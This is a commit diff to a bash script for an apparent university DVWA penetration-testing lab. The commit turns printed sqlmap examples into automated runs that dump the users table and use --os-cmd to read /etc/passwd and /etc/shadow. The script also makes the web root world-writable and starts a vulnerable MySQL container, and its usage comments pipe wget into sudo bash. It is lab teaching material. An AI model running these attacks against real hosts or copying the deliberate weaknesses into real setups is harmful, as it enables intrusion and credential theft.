mount dvwa root directory for mysql container

harshagv · web-flow · commit 915d8d9f05e9 · 2025-09-14T04:24:41.000+10:00
diff --git a/usyd/scripts-library/dvwa-pentest-lab.sh b/usyd/scripts-library/dvwa-pentest-lab.sh
@@ -26,10 +26,10 @@
 #   wget -qO- https://raw.githubusercontent.com/harshagv/pythonWorks/master/usyd/scripts-library/dvwa-pentest-lab.sh | DVWA_PHPSESSID=<PHPSESSID> DVWA_TARGET_URL="<http://DVWA_IP>" sudo -E bash -s kali_vuln_scan
 #       - Provides guidance for OWASP ZAP or OpenVAS scanning.
 #
-#   wget -qO- https://raw.githubusercontent.com/harshagv/pythonWorks/master/usyd/scripts-library/dvwa-pentest-lab.sh | DVWA_TARGET_URL="<http://DVWA_IP>" sudo -E bash -s kali_sqlmap_sqli
+#   wget -qO- https://raw.githubusercontent.com/harshagv/pythonWorks/master/usyd/scripts-library/dvwa-pentest-lab.sh | DVWA_PHPSESSID=<PHPSESSID> DVWA_TARGET_URL="<http://DVWA_IP>" sudo -E bash -s kali_sqlmap_sqli
 #       - Provides sample sqlmap commands for basic SQL injection.
 #
-#   wget -qO- https://raw.githubusercontent.com/harshagv/pythonWorks/master/usyd/scripts-library/dvwa-pentest-lab.sh | DVWA_TARGET_URL="<http://DVWA_IP>" sudo -E bash -s kali_os_shell
+#   wget -qO- https://raw.githubusercontent.com/harshagv/pythonWorks/master/usyd/scripts-library/dvwa-pentest-lab.sh | DVWA_PHPSESSID=<PHPSESSID> DVWA_TARGET_URL="<http://DVWA_IP>" sudo -E bash -s kali_os_shell
 #       - Attempts to get an OS shell on DVWA VM via sqlmap and extracts sensitive files.
 
 # Generate the script logs
@@ -296,6 +296,7 @@ ubuntu_install_mysql_docker_vulnerable() {
     local MYSQL_IMAGE="mysql"
     local CONTAINER_NAME="dvwa-vulnerable-mysql"
     local MYSQL_ROOT_PASSWORD="password" # Consistent with other parts of the script
+	local DVWA_PATH="/var/www/html/dvwa"
     local DVWA_DB_NAME="dvwa"
     local DVWA_DB_USER="dvwa"
     local DVWA_DB_PASS="pass"
@@ -369,20 +370,14 @@ ubuntu_install_mysql_docker_vulnerable() {
     print_info "Starting MySQL ${VULN_MYSQL_VERSION} Docker container '${CONTAINER_NAME}'.."
     # Map container port 3306 to host port 3306, relying on native DB being purged.
     # Environment variables handle initial root password, DVWA database, and DVWA user creation.
-    # docker run --name "${CONTAINER_NAME}" \
-    #            -e MYSQL_ROOT_PASSWORD="${MYSQL_ROOT_PASSWORD}" \
-    #            -e MYSQL_DATABASE="${DVWA_DB_NAME}" \
-    #            -e MYSQL_USER="${DVWA_DB_USER}" \
-    #            -e MYSQL_PASSWORD="${DVWA_DB_PASS}" \
-    #            -p 3306:3306 \
-    #            -d "${MYSQL_IMAGE}:${VULN_MYSQL_VERSION}"
 	docker run --name "${CONTAINER_NAME}" \
-	           --network host \
-	           -e MYSQL_ROOT_PASSWORD="${MYSQL_ROOT_PASSWORD}" \
-	           -e MYSQL_DATABASE="${DVWA_DB_NAME}" \
-	           -e MYSQL_USER="${DVWA_DB_USER}" \
-	           -e MYSQL_PASSWORD="${DVWA_DB_PASS}" \
-	           -d "${MYSQL_IMAGE}:${VULN_MYSQL_VERSION}" || { print_error "Failed to start MySQL Docker container. Check 'docker logs ${CONTAINER_NAME}' for details."; exit 1; }
+	    --network host \
+	    -v "${DVWA_PATH}:${DVWA_PATH}" \
+	    -e MYSQL_ROOT_PASSWORD="${MYSQL_ROOT_PASSWORD}" \
+	    -e MYSQL_DATABASE="${DVWA_DB_NAME}" \
+	    -e MYSQL_USER="${DVWA_DB_USER}" \
+	    -e MYSQL_PASSWORD="${DVWA_DB_PASS}" \
+	    -d "${MYSQL_IMAGE}:${VULN_MYSQL_VERSION}" || { print_error "Failed to start MySQL Docker container. Check 'docker logs ${CONTAINER_NAME}' for details."; exit 1; }
 
     print_info "Waiting for MySQL container to become healthy (up to 90 seconds).."
     local RETRIES=18 # 18 * 5 seconds = 90 seconds
@@ -460,6 +455,7 @@ ubuntu_set_dvwa_permissions() {
     fi
 
     sudo chmod -R ugo+rw "$DVWA_PATH"
+	sudo ls -la "$DVWA_PATH"
     print_success "Permissions set for $DVWA_PATH to be world-writable (ugo+rw)."
     print_info "This is specifically for enabling sqlmap's --os-shell upload capabilities to write files to the web root."
 }
@@ -508,6 +504,7 @@ kali_install_tools_prerequisites() {
         export PATH="$PATH:${PIPX_BIN_DIR}"
     fi
 
+    # Ensure pipx's environment is correctly set up for the target user's shell configuration
     print_info "Ensuring pipx path is correctly set up in shell config for user '$TARGET_USER'..."
     sudo -u "$TARGET_USER" pipx ensurepath --force > /dev/null 2>&1 || print_warn "pipx ensurepath failed for user '$TARGET_USER'."
 
@@ -518,6 +515,8 @@ kali_install_tools_prerequisites() {
     else
         print_error "Failed to install/upgrade zap-cli-v2 for user '$TARGET_USER'."
     fi
+    
+    # Verify zap-cli-v2 is executable *within the current script's PATH*
     if command -v zap-cli-v2 &> /dev/null; then
         print_success "zap-cli-v2 executable found in current PATH."
     else
@@ -1027,103 +1026,171 @@ EOF
 # Function: kali_demonstrate_sqlmap_sqli
 # Provides sample sqlmap commands for basic SQL injection attacks against DVWA.
 kali_demonstrate_sqlmap_sqli() {
-    print_title "=== SQLmap SQL Injection Demonstration ==="
-
-    local TARGET="$DVWA_TARGET_URL"
-    local SQLMAP_OUTDIR="$HOME/scans/dvwa/sqlmap_sqli"
-    mkdir -p "$SQLMAP_OUTDIR"
+    print_title "=== Running SQLmap SQL Injection Scans ==="
 
-    print_info "Targeting DVWA VM at: ${TARGET}"
-
-    print_info "Before running sqlmap:"
-    print_info "1. Log into DVWA (admin/password) from your Kali browser."
-    print_info "2. Set the 'Security Level' to 'Low' under 'DVWA Security'."
-    print_info "3. Navigate to 'SQL Injection (Blind)' or 'SQL Injection' vulnerabilities."
-    print_info "4. Capture your PHPSESSID cookie from browser developer tools (e.g., Firefox: F12 -> Storage -> Cookies)."
-    print_warn "   You MUST replace <YOUR_PHPSESSID_HERE> with your actual PHPSESSID cookie value for these commands to work."
+    # --- Step 1: Validate Environment Variables ---
+    if [ -z "${DVWA_TARGET_URL:-}" ]; then
+        print_error "DVWA_TARGET_URL environment variable is not set."
+        print_info "Please run the script like: DVWA_TARGET_URL=\"http://<IP>\" sudo -E bash -s kali_sqlmap_sqli"
+        exit 1
+    fi
+    if [ -z "${DVWA_PHPSESSID:-}" ]; then
+        print_error "DVWA_PHPSESSID environment variable is not set."
+        print_info "Please run the script like: DVWA_PHPSESSID=\"<ID>\" DVWA_TARGET_URL=\"http://<IP>\" sudo -E bash -s kali_sqlmap_sqli"
+        exit 1
+    fi
+    print_info "Using DVWA Target URL: ${DVWA_TARGET_URL}"
+    print_info "Using PHPSESSID: ${DVWA_PHPSESSID}"
     echo ""
+    # --- End Validation ---
 
-    print_info "Example 1: Listing databases using sqlmap against DVWA SQLi (GET) vulnerability:"
-    echo "${GREEN}sqlmap -u \"${TARGET}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit\" \\"
-    echo "    --cookie=\"PHPSESSID=<YOUR_PHPSESSID_HERE>; security=low\" \\"
-    echo "    --dbs --batch --level=1 --risk=1 \\"
-    echo "    --output-dir=\"${SQLMAP_OUTDIR}\" --file-log=\"${SQLMAP_OUTDIR}/sqlmap_sqli_dbs.log\"${RESET}"
+    local TARGET="${DVWA_TARGET_URL%/}" # Sanitize URL to remove trailing slash
+    local PHPSESSID="$DVWA_PHPSESSID"
+    local TARGET_USER=$(logname 2>/dev/null || echo "$SUDO_USER")
+    local USER_HOME=$(eval echo "~${TARGET_USER}")
+    local OUTDIR="${USER_HOME}/scans/dvwa/sqlmap_sqli"
+    
+    # Prepare output directory and ensure correct ownership
+    sudo mkdir -p "$OUTDIR"
+    sudo chown -R "$TARGET_USER":"$TARGET_USER" "$OUTDIR"
+
+    # --- Step 2: Define Base Command and Run Scans ---
+    local SQLI_URL="${TARGET}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
+    local COOKIE_STRING="PHPSESSID=${PHPSESSID}; security=low"
+    
+    # Base command for all sqlmap executions. --batch is critical for non-interactive runs.
+    local SQLMAP_BASE_CMD="sqlmap -u \"${SQLI_URL}\" --cookie=\"${COOKIE_STRING}\" --batch --level=1 --risk=1 --output-dir=\"${OUTDIR}\""
+
+    # Scan 1: List Databases
+    local DBS_LOG="${OUTDIR}/1_databases_list.log"
+    print_info "Running sqlmap to list databases... Log: ${DBS_LOG}"
+    if sudo -u "$TARGET_USER" bash -c "${SQLMAP_BASE_CMD} --dbs" > "${DBS_LOG}" 2>&1; then
+        print_success "Successfully listed databases."
+    else
+        print_error "Failed to list databases. Check the log file for details."
+    fi
     echo ""
 
-    print_info "Example 2: Dumping tables from the 'dvwa' database:"
-    echo "${GREEN}sqlmap -u \"${TARGET}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit\" \\"
-    echo "    --cookie=\"PHPSESSID=<YOUR_PHPSESSID_HERE>; security=low\" \\"
-    echo "    -D dvwa --tables --batch --level=1 --risk=1 \\"
-    echo "    --output-dir=\"${SQLMAP_OUTDIR}\" --file-log=\"${SQLMAP_OUTDIR}/sqlmap_sqli_tables.log\"${RESET}"
+    # Scan 2: List Tables from 'dvwa' database
+    local TABLES_LOG="${OUTDIR}/2_tables_list.log"
+    print_info "Running sqlmap to list tables from 'dvwa' database... Log: ${TABLES_LOG}"
+    if sudo -u "$TARGET_USER" bash -c "${SQLMAP_BASE_CMD} -D dvwa --tables" > "${TABLES_LOG}" 2>&1; then
+        print_success "Successfully listed tables."
+    else
+        print_error "Failed to list tables. Check the log file for details."
+    fi
     echo ""
 
-    print_info "Example 3: Dumping columns from the 'users' table in 'dvwa' database:"
-    echo "${GREEN}sqlmap -u \"${TARGET}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit\" \\"
-    echo "    --cookie=\"PHPSESSID=<YOUR_PHPSESSID_HERE>; security=low\" \\"
-    echo "    -D dvwa -T users --columns --batch --level=1 --risk=1 \\"
-    echo "    --output-dir=\"${SQLMAP_OUTDIR}\" --file-log=\"${SQLMAP_OUTDIR}/sqlmap_sqli_columns.log\"${RESET}"
+    # Scan 3: List Columns from 'users' table
+    local COLUMNS_LOG="${OUTDIR}/3_columns_list.log"
+    print_info "Running sqlmap to list columns from 'users' table... Log: ${COLUMNS_LOG}"
+    if sudo -u "$TARGET_USER" bash -c "${SQLMAP_BASE_CMD} -D dvwa -T users --columns" > "${COLUMNS_LOG}" 2>&1; then
+        print_success "Successfully listed columns."
+    else
+        print_error "Failed to list columns. Check the log file for details."
+    fi
     echo ""
 
-    print_info "Example 4: Dumping data (usernames/passwords) from the 'users' table in 'dvwa' database:"
-    echo "${GREEN}sqlmap -u \"${TARGET}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit\" \\"
-    echo "    --cookie=\"PHPSESSID=<YOUR_PHPSESSID_HERE>; security=low\" \\"
-    echo "    -D dvwa -T users --dump --batch --level=1 --risk=1 \\"
-    echo "    --output-dir=\"${SQLMAP_OUTDIR}\" --file-log=\"${SQLMAP_OUTDIR}/sqlmap_sqli_dump_users.log\"${RESET}"
+    # Scan 4: Dump data from 'users' table
+    local DUMP_LOG="${OUTDIR}/4_users_dump.log"
+    print_info "Running sqlmap to dump data from 'users' table... Log: ${DUMP_LOG}"
+    if sudo -u "$TARGET_USER" bash -c "${SQLMAP_BASE_CMD} -D dvwa -T users --dump" > "${DUMP_LOG}" 2>&1; then
+        print_success "Successfully dumped user data."
+    else
+        print_error "Failed to dump user data. Check the log file for details."
+    fi
     echo ""
 
-    print_success "SQLmap SQL Injection demonstration commands provided. Manual execution is required."
-    print_info "Ensure you replace <YOUR_PHPSESSID_HERE> with your valid session cookie."
+    print_success "All SQLmap scans have been executed. Check the logs in ${OUTDIR} for detailed results."
 }
 
 # Function: kali_exploit_sqlmap_os_shell
 # Attempts to get an OS shell on DVWA VM via sqlmap and extracts sensitive files.
 kali_exploit_sqlmap_os_shell() {
-    print_title "=== SQLmap OS Shell Exploitation (DVWA - Vulnerable MySQL Required) ==="
+    print_title "=== Running SQLmap OS Shell Exploitation ==="
 
-    local TARGET="$DVWA_TARGET_URL"
-    local OS_SHELL_OUTDIR="$HOME/scans/dvwa/os_shell_loot"
-    mkdir -p "$OS_SHELL_OUTDIR"
-
-    print_info "Targeting DVWA VM at: ${TARGET}"
-    print_warn "This exploit typically requires the DVWA VM to be running a vulnerable MySQL version (e.g., 5.5 in Docker) and for the DVWA directory to be world-writable (ugo+rw)."
-    print_warn "Ensure you have already run the 'mysql50' argument on the Ubuntu VM (for Dockerized MySQL) AND 'set_permissions_ubuntu' argument for DVWA directory."
-    print_info "Verify MySQL Docker container is running on your Ubuntu VM: 'sudo docker ps -f name=dvwa-vulnerable-mysql' (from the Ubuntu VM)"
-
-
-    print_info "Before running sqlmap --os-shell:"
-    print_info "1. Log into DVWA (admin/password) from your Kali browser."
-    print_info "2. Set the 'Security Level' to 'Low' under 'DVWA Security'."
-    print_info "3. Navigate to 'SQL Injection (Blind)' or 'SQL Injection' vulnerabilities."
-    print_info "4. Capture your PHPSESSID cookie from browser developer tools."
-    print_warn "   You MUST replace <YOUR_PHPSESSID_HERE> with your actual PHPSESSID cookie value."
+    # --- Step 1: Validate Environment Variables ---
+    if [ -z "${DVWA_TARGET_URL:-}" ]; then
+        print_error "DVWA_TARGET_URL environment variable is not set."
+        print_info "Please run the script like: DVWA_TARGET_URL=\"http://<IP>\" sudo -E bash -s kali_os_shell"
+        exit 1
+    fi
+    if [ -z "${DVWA_PHPSESSID:-}" ]; then
+        print_error "DVWA_PHPSESSID environment variable is not set."
+        print_info "Please run the script like: DVWA_PHPSESSID=\"<ID>\" DVWA_TARGET_URL=\"http://<IP>\" sudo -E bash -s kali_os_shell"
+        exit 1
+    fi
+    print_info "Using DVWA Target URL: ${DVWA_TARGET_URL}"
+    print_info "Using PHPSESSID: ${DVWA_PHPSESSID}"
     echo ""
+    # --- End Validation ---
 
-    # Using --os-cmd for each command, as interactive shells are hard to script and log
-    # For sqlmap --os-cmd, it typically tries to upload a web shell and execute the command.
-    # We must also provide the web server root and language.
-    local SQLMAP_BASE_CMD="sqlmap -u \"${TARGET}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit\" --cookie=\"PHPSESSID=<YOUR_PHPSESSID_HERE>; security=low\" --web-server=apache --os-shell-chroot=/ --technique=U --batch --retries=3 --tmp-dir=$OS_SHELL_OUTDIR --data-dir=$OS_SHELL_OUTDIR" # --data-dir specified for sqlmap temp files
-
-    # Using 'eval' because the command string contains variables and needs to be parsed by the shell
-    print_info "Running 'pwd' via sqlmap --os-cmd. Output saved to ${OS_SHELL_OUTDIR}/pwd.log"
-    eval "${SQLMAP_BASE_CMD} --os-cmd=\"pwd\" --file-log=\"${OS_SHELL_OUTDIR}/pwd.sqlmap.log\" > \"${OS_SHELL_OUTDIR}/pwd.log\" 2>&1" || print_warn "Failed to run 'pwd' or output capture issue. Check logs."
-
-    print_info "Running 'whoami' via sqlmap --os-cmd. Output saved to ${OS_SHELL_OUTDIR}/whoami.log"
-    eval "${SQLMAP_BASE_CMD} --os-cmd=\"whoami\" --file-log=\"${OS_SHELL_OUTDIR}/whoami.sqlmap.log\" > \"${OS_SHELL_OUTDIR}/whoami.log\" 2>&1" || print_warn "Failed to run 'whoami' or output capture issue. Check logs."
-
-    print_info "Running 'cat /etc/passwd' via sqlmap --os-cmd. Output saved to ${OS_SHELL_OUTDIR}/passwd.log"
-    eval "${SQLMAP_BASE_CMD} --os-cmd=\"cat /etc/passwd\" --file-log=\"${OS_SHELL_OUTDIR}/passwd.sqlmap.log\" > \"${OS_SHELL_OUTDIR}/passwd.log\" 2>&1" || print_warn "Failed to run 'cat /etc/passwd' or output capture issue. Check logs."
+    local TARGET="${DVWA_TARGET_URL%/}" # Sanitize URL
+    local PHPSESSID="$DVWA_PHPSESSID"
+    local TARGET_USER=$(logname 2>/dev/null || echo "$SUDO_USER")
+    local USER_HOME=$(eval echo "~${TARGET_USER}")
+    local OUTDIR="${USER_HOME}/scans/dvwa/os_shell_loot"
+    
+    # Prepare output directory and ensure correct ownership
+    sudo mkdir -p "$OUTDIR"
+    sudo chown -R "$TARGET_USER":"$TARGET_USER" "$OUTDIR"
 
-    print_info "Running 'cat /etc/shadow' via sqlmap --os-cmd. Output saved to ${OS_SHELL_OUTDIR}/shadow.log"
-    eval "${SQLMAP_BASE_CMD} --os-cmd=\"cat /etc/shadow\" --file-log=\"${OS_SHELL_OUTDIR}/shadow.sqlmap.log\" > \"${OS_SHELL_OUTDIR}/shadow.log\" 2>&1" || print_warn "Failed to run 'cat /etc/shadow' or output capture issue. Check logs."
+    print_warn "This exploit requires the DVWA VM to be running a vulnerable MySQL version (e.g., 5.5 in Docker) and for the DVWA directory to be world-writable (ugo+rw)."
+    print_warn "Ensure you have already run the 'mysql50' and 'set_permissions_ubuntu' arguments on the Ubuntu VM."
+    
+    # --- Step 2: Define a Truly Non-Interactive, Robust sqlmap Command ---
+    local SQLI_URL="${TARGET}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
+    local COOKIE_STRING="PHPSESSID=${PHPSESSID}; security=low"
+
+    # --flush-session: Clears old data for a clean run.
+    # --answers="...": Pre-answers the interactive prompts seen in the log.
+    # --os=Linux: Specifies the target OS to avoid fingerprinting prompts.
+    # --web-root: Explicitly defines the web root to prevent guesswork failures.
+    local SQLMAP_BASE_CMD="sqlmap -u \"${SQLI_URL}\" \
+        --cookie=\"${COOKIE_STRING}\" \
+        --batch \
+        --flush-session \
+        --os=Linux \
+        --web-root=\"/var/www/html/dvwa\" \
+        --answers=\"language=4,follow=Y,merge=Y\" \
+        --output-dir=\"${OUTDIR}\""
+
+    # Command Execution Array
+    declare -a COMMANDS_TO_RUN=("pwd" "whoami" "cat /etc/passwd" "cat /etc/shadow")
+
+    for CMD in "${COMMANDS_TO_RUN[@]}"; do
+        local CMD_SLUG=$(echo "$CMD" | tr -d ' /') # Create a safe filename, e.g., "catetcpasswd"
+        local CMD_LOG="${OUTDIR}/${CMD_SLUG}.log"
+        print_info "Running '${CMD}' via sqlmap --os-cmd. Log: ${CMD_LOG}"
+
+        local FULL_SQLMAP_CMD="${SQLMAP_BASE_CMD} --os-cmd=\"${CMD}\""
+
+        # Temporarily disable 'set -e' for the sqlmap command
+        set +e
+        sudo -u "$TARGET_USER" bash -c "$FULL_SQLMAP_CMD" > "$CMD_LOG" 2>&1
+        local SQLMAP_EXIT_CODE=$?
+        set -e
 
-    print_success "SQLmap OS shell commands attempted. Check the files in ${OS_SHELL_OUTDIR} for output."
-    print_info "If '--os-cmd' commands fail, try the interactive '--os-shell' mode manually:"
-    echo "${GREEN}sqlmap -u \"${TARGET}/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit\" \\"
-    echo "    --cookie=\"PHPSESSID=<YOUR_PHPSESSID_HERE>; security=low\" \\"
-    echo "    --os-shell --web-server=apache --os-shell-chroot=/ \\"
-    echo "    --output-dir=\"$OS_SHELL_OUTDIR\"${RESET}"
-    print_warn "   Remember to replace <YOUR_PHPSESSID_HERE>."
-    print_info "   When in the sql-shell, you might be asked to provide web server language (choose 'php'), and web server document root (specify '/var/www/html/dvwa')."
+        if [ "$SQLMAP_EXIT_CODE" -eq 0 ]; then
+            print_success "sqlmap completed for '${CMD}' (exit code 0)."
+            echo "--- Output for '${CMD}' ---"
+            # Filter for the actual command output which sqlmap usually puts in a "command output" section
+            if grep -q "command output" "$CMD_LOG"; then
+                # A bit complex, but this extracts the block of text under "command output"
+                sudo awk '/command output:/ {flag=1; next} /\[\*\] ending/ {flag=0} flag' "$CMD_LOG"
+            else
+                print_warn "Could not find 'command output' section. Displaying raw relevant log:"
+                sudo grep -vE '^\[\*\]|^\[INFO\]|^\[WARNING\]' "$CMD_LOG"
+            fi
+            echo "--------------------------"
+        else
+            print_error "sqlmap failed for '${CMD}' with exit code $SQLMAP_EXIT_CODE."
+            print_info "Check the full log for details: ${CMD_LOG}"
+        fi
+        echo ""
+    done
+    
+    print_success "All SQLmap OS shell commands have been attempted. Check the logs in ${OUTDIR} for detailed output."
 }
 
 # Function to display the final signature
